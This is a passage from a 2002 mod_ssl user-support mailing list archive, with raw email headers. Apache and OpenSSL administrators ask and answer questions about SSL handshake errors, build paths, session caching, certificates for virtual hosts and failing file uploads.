sometimes 724, sometimes 982, = sometimes 972,... I red about my config was pointing to a wrong port and i may had "Listen = 80" instead of "Port 80". That is all i found about this error, and it = was already done in my config. Thanks a lot, Regards, MARTIN Pierre PS: Sorry for my bad english... http://hickscorp.dyndns.org http://3dMeeting.dyndns.org http://Iloa.dyndns.org http://StatsAGogo.dyndns.org http://www.Lv4-26.com MSN: HicksCorp@Hotmail.com ICQ: 73133239 ------=_NextPart_000_0005_01C1C0FD.DD541AA0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi, im using an apache server with = mod_ssl. =20 (the last one, newest one version...)
I get the error
 
724:error:140770FC:SSL=20 routines:SSL23_GET_SERVER_HELLO:unknown=20 protocol:D:\MyPro
jects\Applications\opensa\openssl\ssl\s23_clnt.c:460= :
 
When i'm trying to connect. I can only = read this=20 with the openssl s_client mode, because the broser just search forever = when i=20 type the secured domain name.
 
Notice that the number of the error is = sometimes=20 724, sometimes 982, sometimes 972,...
 
I red about my config was pointing to a = wrong port=20 and i may had "Listen 80" instead of "Port 80". That is all i found = about this=20 error, and it was already done in my config.
 
Thanks a lot,
Regards, MARTIN Pierre
 
 
PS: Sorry for my bad = english...
 
http://hickscorp.dyndns.org
<= A=20 href=3D"http://3dMeeting.dyndns.org">http://3dMeeting.dyndns.org
<= A=20 href=3D"http://Iloa.dyndns.org">http://Iloa.dyndns.org
http://StatsAGogo.dyndns.orghttp://www.Lv4-26.com
 
MSN: HicksCorp@Hotmail.com
ICQ:=20 73133239
------=_NextPart_000_0005_01C1C0FD.DD541AA0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 12:02:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA26834; Fri, 1 Mar 2002 12:01:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA26767; Fri, 1 Mar 2002 12:01:05 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id B02074CE581; Fri, 1 Mar 2002 12:01:04 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g21B0KO57003; Fri, 1 Mar 2002 12:00:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from th10.opsion.fr id KAA15282; Fri, 1 Mar 2002 10:15:53 +0100 (MET) Received: from 212.180.95.194 [212.180.95.194] by th10.opsion.fr id 200203010914.1f34; Fri, 1 Mar 2002 09:14:31 GMT From: "Estrade Matthieu" To: Subject: HTTPD_ROOT Date: Fri, 1 Mar 2002 10:15:03 +0100 Message-ID: <000001c1c101$9384da50$0264220a@Matthieu> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0001_01C1C109.F54BB350" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Estrade Matthieu" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C1C109.F54BB350 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hi Since this morning, i have installed the last mod_ssl because of the overflow bug post on all security forum, The last one i used was 2.8.6 When i compile mod_ssl (version 2.8.7) on my redhat linux 7.2, with -prefix=/mypath, the HTTPD_ROOT in the Makefile is still /usr/local/apache. All the others path modifications are updated, like apache is installing all conf files in /mypath/conf, but it still search the conf file in /usr/local/apache Is you have any ideas Thanks, Estrade Matthieu ------=_NextPart_000_0001_01C1C109.F54BB350 Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable

Hi

 

Since this morning, i = have installed the last mod_ssl because of the overflow bug post on all = security forum,

The last one i used = was 2.8.6

 

When i compile mod_ssl (version 2.8.7) on my redhat linux 7.2, with –prefix=3D/mypath, = the HTTPD_ROOT in the Makefile is still = /usr/local/apache.

All the others path modifications are updated, like apache is installing all conf files in /mypath/conf, but it still search the conf file in = /usr/local/apache

 

Is you have any = ideas

Thanks,

 

Estrade = Matthieu

------=_NextPart_000_0001_01C1C109.F54BB350-- ______________________________________________________________________________ ifrance.com, l'email gratuit le plus complet de l'Internet ! vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP... http://www.ifrance.com/_reloc/email.emailif ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 12:16:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA29160; Fri, 1 Mar 2002 12:15:41 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id MAA28978; Fri, 1 Mar 2002 12:15:06 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id MAA25115 for ; Fri, 1 Mar 2002 12:14:57 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma025096; Fri, 1 Mar 02 12:14:55 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id MAA23079 for ; Fri, 1 Mar 2002 12:14:55 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id MAA29767 for ; Fri, 1 Mar 2002 12:14:54 +0100 (MET) Message-ID: <3C7F62AE.1461890E@bourse.ch> Date: Fri, 01 Mar 2002 12:14:54 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: I need help please! References: <000801c1c0f5$7ba81ca0$6700a8c0@progstation01> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > MARTIN Pierre wrote: > > Hi, im using an apache server with mod_ssl. (the last one, newest one > version...) > I get the error > > 724:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown > protocol:D:\MyPro > jects\Applications\opensa\openssl\ssl\s23_clnt.c:460: > > When i'm trying to connect. I can only read this with the openssl > s_client mode, because the broser just search forever when i type the > secured domain name. > > Notice that the number of the error is sometimes 724, sometimes 982, > sometimes 972,... > > I red about my config was pointing to a wrong port and i may had > "Listen 80" instead of "Port 80". That is all i found about this > error, and it was already done in my config. You're trying to connect to an SSL-aware server with plain HTTP. Do you want an SSL server? If so, you must set up a VH on port 443 then access it using "https://servername/" <-- NB "https", *not* "http". rgds, Owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 12:59:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA04860; Fri, 1 Mar 2002 12:59:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from smtprelay3.dc3.adelphia.net id MAA04750; Fri, 1 Mar 2002 12:58:05 +0100 (MET) Received: from localhost.onetechnologies.net ([68.65.236.89]) by smtprelay3.dc3.adelphia.net (Netscape Messaging Server 4.15) with ESMTP id GS9PJV00.6B8 for ; Thu, 28 Feb 2002 19:04:43 -0500 Message-Id: <5.1.0.14.0.20020228155817.01b0f3b0@pop3.onetechnologies.net> X-Sender: roger@pop3.onetechnologies.net X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Thu, 28 Feb 2002 16:04:32 -0800 To: modssl-users@modssl.org From: Roger Subject: SSL Session Cache Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Roger X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I run the following command: openssl s_client -connect www.mysite.com:443 and below is the end of the output: New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA Server public key is 1024 bit SSL-Session: Protocol : TLSv1 Cipher : EDH-RSA-DES-CBC3-SHA Session-ID: Session-ID-ctx: Master-Key: 66861E5A4DDFF5C008DB2319D9AD470CB3E20EBE2F7ECACC093B77CD9673E8110ACDE9BBF36A01B5D69F3F39AA7E5 Key-Arg : None Start Time: 1014941077 Timeout : 300 (sec) Verify return code: 0 (ok) It has a Session-ID of nothing. Does this mean I do not have SSL caching turned on? I do have the following lines in httpd.conf: SSLSessionCache dbm:/usr/local/apache/logs/ssl_gcache_data SSLSessionCacheTimeout 300 Should I be able to see the 'ssl_gcache_data' file in /usr/local/apache/logs/ ? Roger ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 14:04:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA13391; Fri, 1 Mar 2002 14:02:24 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.cableone.net id OAA13221; Fri, 1 Mar 2002 14:00:33 +0100 (MET) Received: from b2v2l7 ([24.116.137.140]) by mail3.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 1 Mar 2002 05:52:12 -0700 Message-ID: <001501c1c11f$24c016c0$8c897418@b2v2l7> From: "Joe Pearson" To: References: <3C7EDEB9.4060809@xtra.co.nz> Subject: Re: Virtual hosts and ssl. Date: Fri, 1 Mar 2002 05:46:44 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 x-mimeole: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You can only have one certificate per hostname. So you need to enter the FQDN of the host. If you want to use this for all your hosted users, the URL would need to go to this FQDN. So all your virtual domains would need to switch to this url when they want SSL. If you want to have multiple virtual domains with their own certificate, you need to setup IP based virtual domains. In other words, each virtual domain would need their own IP address. ----- Original Message ----- From: "David" To: Sent: Thursday, February 28, 2002 6:51 PM Subject: Virtual hosts and ssl. > Hello, > > Could someone clarify this point for me please. > > When compiling a .crs the following message is displayed which implies I > don't have to use a FQND > > Common Name (eg, your name or your server's hostname) []: > > But from the ssl-faq it says > > Make sure you enter the FQDN ("Fully Qualified Domain Name") of the > server when OpenSSL prompts you for the "CommonName" > > > I have several virtual users hosted on the same apache server and want > to be able to provide ssl for them. Do I have to use a FQDN and > therefore need an individual certificate for Virtual user or can I have > one certificate in the name of the hosting organization that will > provide ssl for all the hosted users? > > Thanks. > > -David. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 15:17:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA20795; Fri, 1 Mar 2002 15:16:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA20754; Fri, 1 Mar 2002 15:15:35 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 822F04CE6E2; Fri, 1 Mar 2002 15:15:34 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g21EEKU61428; Fri, 1 Mar 2002 15:14:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from david.speedpartner.de id OAA15141; Fri, 1 Mar 2002 14:21:24 +0100 (MET) Received: (qmail 5302 invoked from network); 1 Mar 2002 13:21:24 -0000 Received: from pd9e22248.dip.t-dialin.net (HELO w01) (217.226.34.72) by 195.167.218.66 with SMTP; 1 Mar 2002 13:21:24 -0000 From: "Michael Metz" To: modssl-users@modssl.org Date: Fri, 1 Mar 2002 14:20:56 +0100 MIME-Version: 1.0 Subject: Problem with File-Upload>20k Message-ID: <3C7F8E48.14460.12EF38A@localhost> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Metz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi there, i'm running a SSL enabled WebServer since nearly 1 month. Today I wanted to make an http-file-upload (~20k) an received the following error in my error_log: [Fri Mar 1 11:26:41 2002] [error] mod_ssl: SSL error on reading data (OpenSSL library error follows) [Fri Mar 1 11:26:41 2002] [error] OpenSSL: error:1408F10B:SSL routines:SSL3_GET_RECORD:wrong version number After that I updated my openssl-Version (which was from Dec 2000) to the current release "OpenSSL 0.9.6c [engine] 21 dec 2001" and recompiled my apache 1.3.23 mit mod_ssl 2.8.7-1.3.23. With no other result. Normal connections seem to work fine (Opera says "High Encryption TLS v1.0 128 bit C4 (1024 bit RSA/SHA) but File-Uploads fail when they are larger than about 20k. Smaller files work fine .... I'm running on RedHat 7.1 Can anyone give me a solution for this problem? MfG Michael ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 15:47:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA22984; Fri, 1 Mar 2002 15:46:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA22931; Fri, 1 Mar 2002 15:45:23 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g21Eipv13250 for ; Fri, 1 Mar 2002 14:44:57 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Fri, 1 Mar 2002 14:44:43 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066E1E@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Problem with File-Upload>20k Date: Fri, 1 Mar 2002 14:44:32 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This kind of error is often seen where there is a conflict between the built-in version of openssl and the version you have compiled. Redhat 7.0,7.1 and 7.2 all come with openssl. Currently they are all older versions than what you can compile from source, and so are the version of apache and mod_ssl that they supply. Can you check what you get if you type rpm -q apache rpm -q mod_ssl These are the built-in packages, which may also conflict with what you have compiled. Unlike openssl, you will be able to remove these packages, although you may have to remove other packages also. In the case of openssl, ensure you don't overwrite the built-in one in /usr/bin. Use /usr/local/bin instead. If you have, use rpm -ivh "openssl-package-name" --force To forcibly reinstall the built-in package. Incidentally, I'm currently writing a submission for the openssl FAQ because this comes up so often. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Michael Metz [mailto:mail@michael-metz.de] >Sent: 01 March 2002 13:21 >To: modssl-users@modssl.org >Subject: Problem with File-Upload>20k > > >Hi there, > >i'm running a SSL enabled WebServer since nearly 1 month. Today I >wanted to make an http-file-upload (~20k) an received the following >error in my error_log: >[Fri Mar 1 11:26:41 2002] [error] mod_ssl: SSL error on reading data >(OpenSSL library error follows) >[Fri Mar 1 11:26:41 2002] [error] OpenSSL: error:1408F10B:SSL >routines:SSL3_GET_RECORD:wrong version number > >After that I updated my openssl-Version (which was from Dec 2000) to >the current release "OpenSSL 0.9.6c [engine] 21 dec 2001" and >recompiled my apache 1.3.23 mit mod_ssl 2.8.7-1.3.23. With no other >result. >Normal connections seem to work fine (Opera says "High Encryption TLS >v1.0 128 bit C4 (1024 bit RSA/SHA) but File-Uploads fail when they >are larger than about 20k. Smaller files work fine .... I'm running >on RedHat 7.1 > >Can anyone give me a solution for this problem? > >MfG > Michael > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 16:34:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA25704; Fri, 1 Mar 2002 16:33:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from microanswers.net id QAA25622; Fri, 1 Mar 2002 16:32:26 +0100 (MET) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by microanswers.net (8.11.0/8.11.0) with SMTP id g21G1sT19636 for ; Fri, 1 Mar 2002 10:01:55 -0600 Message-ID: <043e01c1c136$21751300$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: Subject: Re: Virtual hosts and ssl. Date: Fri, 1 Mar 2002 09:31:16 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear David and list, Jeff wrote: RE:>>Name based VH's don't work on SSL. It seems to me that every hosted DN would need to have its own CERT. Sure, the server could have just one CERT, with all of your DNS users sharing it, but then the identity being confirmed would be that of the ISP. What good would that do for me as a purchaser, to access the Encrypted Key of the ISP if the company with whom I am transacting business is simply one of their hosted Domain Names? If there is a way around having to purchase one CERT per Domain Name, I would like to discover it. However, if I am understanding this correctly, multiple domains can share one IP (which is how I host most domains), but I never did understand the use of Name-Based VH's. In what context are Name-Based VH's of value? From what Jeff states, obviously not on SSL. Andrew L. The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 17:25:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA00255; Fri, 1 Mar 2002 17:24:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pladesigns.com id RAA00164; Fri, 1 Mar 2002 17:23:47 +0100 (MET) Received: from merlin.pladesigns.com [172.25.190.2] by pladesigns.com [63.105.23.195] with SMTP (MDaemon.v3.5.7.R) for ; Fri, 01 Mar 2002 08:22:41 -0800 Received: FROM cairo.pladesigns.com BY merlin.pladesigns.com ; Fri Mar 01 08:22:39 2002 -0800 Received: by CAIRO with Internet Mail Service (5.5.2448.0) id ; Fri, 1 Mar 2002 08:05:32 -0800 Message-ID: <91FBD0B430EFD5118B930060672D982C0D30@CAIRO> From: David Buerer To: modssl-users@modssl.org Subject: RE: Virtual hosts and ssl. Date: Fri, 1 Mar 2002 08:05:30 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain X-MDRemoteIP: 172.25.190.2 X-Return-Path: David@pladesigns.com X-MDaemon-Deliver-To: modssl-users@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Buerer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Andrew, You raise many interesting points in your letter. I've interlaced my comments below: >It seems to me that every hosted DN would need to have its own CERT. Sure, >the server could have just one CERT, with all of your DNS users sharing it, >but then the identity being confirmed would be that of the ISP. What good >would that do for me as a purchaser, to access the Encrypted Key of the ISP >if the company with whom I am transacting business is simply one of their >hosted Domain Names? You're right with only one exception. Certificates are issue for a single domain name. Period. Not an IP address, not a server, but only one FQDN. Thwate does offer one type of certificate, the "supercert" which is valid for a parent domain and all sub-domains underneath, but it's not quite compatible across all browsers. >If there is a way around having to purchase one CERT per Domain Name, I >would like to discover it. However, if I am understanding this correctly, Ditto here. I think it's ridiculous that a certificate will not automatically apply to all sub-domains. When you've got multiple servers, or multiple hosts which are used on a very large site to manage the sub-domains and you have to purchase a yearly certificate subscription for each, it's not only expensive, but a pain, and I'm not sure what the justification is for this. If the root domains are secure, why shouldn't the sub domains be as well???? Maybe the certifying authorities need the money. Who knows. >multiple domains can share one IP (which is how I host most domains), but I >never did understand the use of Name-Based VH's. >In what context are Name-Based VH's of value? From what Jeff states, >obviously not on SSL. Name based virtual hosts are critical anytime you've got redundant servers. For example, consider two servers www1.x.y and www2.x.y. These two server are used for redundancy/fail-over and load balancing. With the advent of name based virtual hosts, both servers can use identical configuration files. This reduces the administrative time since the config files are the same. It also give you the ability to setup a continuous replication of the drives to that all changes on one machine automatically transfer to the other machines in the cluster. This is a really good thing. However, since cert's only apply to one domain, you must purchase one cert for each domain/sub-domain on each computer. So, if you've got two redundant servers hosting one site with four sub-domains each, you just had to purchase (8) certificates yearly. Talk about $$$$. So there's my two cents. As I see it, there are 3 reasons you would use this type of security, 1.) Authenticate the connection, 2.) Secure/Encrypt the data, 3.) Authenticate the individual you're doing business with. Items #1 and #2 in my opinion are the only things you as a consumer/client/customer should depend on SSL for. Given that, there is no reason that all certificates could not be provided domain wide. As to item #3? Well, I kind of take the stand that it's the duty of the client to verify the integrity of the person you're doing business with--not a false reliance on SSL to indicate "this is someone I should give my money to." How do you get around this problem? To my knowledge there isn't any reliable way. In the interim, I have one domain on one IP on one server that takes care of all my SSL needs for all of the sub-domains. However, this is only going to work for so long. I don't get the redundancy I need and administratively it's not very efficient. Oh well. If anyone has come up with any other great ideas, I'd love to hear them. >Andrew L. >The ACL Group, Inc. David Buerer TecnoGenesis, LLC ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 19:25:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA15236; Fri, 1 Mar 2002 19:24:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA15072; Fri, 1 Mar 2002 19:23:10 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 84DE04CE683; Fri, 1 Mar 2002 19:23:09 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g21IMMD74812; Fri, 1 Mar 2002 19:22:22 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from david.speedpartner.de id SAA07133; Fri, 1 Mar 2002 18:19:14 +0100 (MET) Received: (qmail 10794 invoked from network); 1 Mar 2002 17:19:14 -0000 Received: from pd9e22248.dip.t-dialin.net (HELO w01) (217.226.34.72) by 195.167.218.66 with SMTP; 1 Mar 2002 17:19:14 -0000 From: "Michael Metz" To: modssl-users@modssl.org Date: Fri, 1 Mar 2002 18:18:46 +0100 MIME-Version: 1.0 Subject: RE: Problem with File-Upload>20k Message-ID: <3C7FC606.16426.208B390@localhost> In-reply-to: <9B66BBD37D5DD411B8CE00508B69700F02066E1E@pborolocal.rnib.org.uk> X-mailer: Pegasus Mail for Windows (v4.01) Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Michael Metz" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi John, I have reinstalled openssl 0.9.6 (Sep 2000) which was shipped with RedHat 7.1 but with no effect. I'm receiving the same error. apache and/or mod_ssl isn't installed via RPM (checked) I compiled apache/mod_ssl with the following arguments: (I'm using constants for Version-Numbers ....) cd mod_ssl-$MODSSLVERSION ./configure --with-apache=../apache_$APACHEVERSION cd ../apache_$APACHEVERSION CFLAGS="-Wall -DSECURITY_HOLE_PASS_AUTHORIZATION" SSL_BASE="/usr/local/ssl/" export CFLAGS SSL_BASE ./configure --with-layout=RedHat --enable-module=vhost_alias --enable- module=so --enable-module=rewrite --enable-module=log_referer --enable- module=ssl --enable-module=info --add-module=../mod_gzip.c --server- uid=wwwrun --server-gid=www Could there be the problem? Thanks in advance ... Bye Michael Am 1 Mar 2002 14:44 schrieb John.Airey@rnib.org.uk: > This kind of error is often seen where there is a conflict between the > built-in version of openssl and the version you have compiled. > > Redhat 7.0,7.1 and 7.2 all come with openssl. Currently they are all > older versions than what you can compile from source, and so are the > version of apache and mod_ssl that they supply. > > Can you check what you get if you type > > rpm -q apache > rpm -q mod_ssl > > These are the built-in packages, which may also conflict with what you > have compiled. Unlike openssl, you will be able to remove these > packages, although you may have to remove other packages also. In the > case of openssl, ensure you don't overwrite the built-in one in > /usr/bin. Use /usr/local/bin instead. If you have, use > > rpm -ivh "openssl-package-name" --force > > To forcibly reinstall the built-in package. > > Incidentally, I'm currently writing a submission for the openssl FAQ > because this comes up so often. > > - > John Airey > Internet systems support officer, ITCSD, Royal National Institute for > the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 > 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk > > Evolution - A crutch for scientists who can't handle the existence of > the creator. See "disproven scientific theories" and Romans 1:22. > > > >-----Original Message----- > >From: Michael Metz [mailto:mail@michael-metz.de] > >Sent: 01 March 2002 13:21 > >To: modssl-users@modssl.org > >Subject: Problem with File-Upload>20k > > > > > >Hi there, > > > >i'm running a SSL enabled WebServer since nearly 1 month. Today I > >wanted to make an http-file-upload (~20k) an received the following > >error in my error_log: [Fri Mar 1 11:26:41 2002] [error] mod_ssl: > >SSL error on reading data (OpenSSL library error follows) [Fri Mar 1 > >11:26:41 2002] [error] OpenSSL: error:1408F10B:SSL > >routines:SSL3_GET_RECORD:wrong version number > > > >After that I updated my openssl-Version (which was from Dec 2000) to > >the current release "OpenSSL 0.9.6c [engine] 21 dec 2001" and > >recompiled my apache 1.3.23 mit mod_ssl 2.8.7-1.3.23. With no other > >result. Normal connections seem to work fine (Opera says "High > >Encryption TLS v1.0 128 bit C4 (1024 bit RSA/SHA) but File-Uploads > >fail when they are larger than about 20k. Smaller files work fine > >.... I'm running on RedHat 7.1 > > > >Can anyone give me a solution for this problem? > > > >MfG > > Michael > > > >_____________________________________________________________________ > >_ Apache Interface to OpenSSL (mod_ssl) > >www.modssl.org User Support Mailing List > >modssl-users@modssl.org Automated List Manager > > majordomo@modssl.org > > > > - > > NOTICE: The information contained in this email and any attachments is > confidential and may be legally privileged. If you are not the > intended recipient you are hereby notified that you must not use, > disclose, distribute, copy, print or rely on this email's content. If > you are not the intended recipient, please notify the sender > immediately and then delete the email and any attachments from your > system. > > RNIB has made strenuous efforts to ensure that emails and any > attachments generated by its staff are free from viruses. However, it > cannot accept any responsibility for any viruses which are > transmitted. We therefore recommend you scan all attachments. > > Please note that the statements and views expressed in this email and > any attachments are those of the author and do not necessarily > represent those of RNIB. > > RNIB Registered Charity Number: 226227 > > Website: http://www.rnib.org.uk > > 14th June 2002 is RNIB Look Loud Day - visit > http://www.lookloud.org.uk to find out all about it. > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 1 19:33:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16327; Fri, 1 Mar 2002 19:32:44 +0100 (MET) Received: by 